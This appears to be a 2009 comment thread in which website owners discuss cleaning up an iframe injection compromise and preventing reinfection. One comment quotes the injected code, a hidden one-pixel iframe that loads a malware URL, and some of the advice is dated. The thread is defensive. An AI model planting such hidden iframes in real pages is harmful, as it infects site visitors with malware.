Now that I’ve cleared it, attacks have stopped. You all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

Cheers :)

Akash

Anyway, the most important step is to prevent reinfection.

I too have had my site compromised with the iframe attack.

System: Mac OSX 10.5.6
Host: BlueHost.com
Installs: WP, Drupal and MT
Date of Compromise: 040709

The malicious code looked like this:

iframe src=”http:// cheapslotplay .cn/ in.cgi ? income47″ width=1 height=1 style=”visibility: hidden”>

and

I first learned of the compromise when a twitter follower notified me of a malware alert when he came to my site.

I poked around and discovered the multitude of appended to end of my source code.

A quick (grep -r “<iframe” .) in console informed me that hundreds of pages had been hacked (index, home, main, default).

Long story short I found a script that will go in and clean up your site. It was $10 and well worth it. You don’t have to know any code so James your in luck.

The code is only set up for “goooogleadsence . biz” so if your attack is from a different site you have to change the name. Easiest thing to do is find and replace that url with the your pest url, save, run and repeat the process for other urls. In my case I had 3 different ones.

I got the code here: http://www.yourjoomlapro.com/

So far so good… I’ve changed my passwords and permissions so we’ll see if they strike again.

Hope this helps.

Every browser is vulnerable. Get yourself a decent antivirus and firewall. Update your browser and OS regularly. Move to a Mac or Linux to minimize security threats. If you are using FireFox – consider the NoScript plugin.

No antivirus is perfect. You can get the antivirus that detects that particular malware, but what about thousands of other viruses and spyware?

“Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site”.

Do you possibly know, precisely which browsers are vulnerable? Should I simply avoid using Internet Explorer? Is browsing using a Firefox 3 with JavaScript enabled safe? I would rather not disable JS completely, but if it is necessary, I will.

Also, say I found and downloaded some antivirus software which correctly detects the malware that the injected IFRAME elements download (http://www.virustotal.com/analisis/3dfacd15cfe5b67d14a3d03b8ac27a32). If I scan the computer with them, am I 100% safe? Maybe that binary executable is just assistant software, which then downloads the virus itself?…

I am afraid that these are rhetorical questions, at least for now, but possible answers will be appreciated. :)

You don’t actually need any programming skills. Just replace server files with a clean copy. Make sure your own computer is not infected by spyware. Then change all passwords. Don’t store your passwords inside programs that upload files to server. And consider contacting your hosting provider.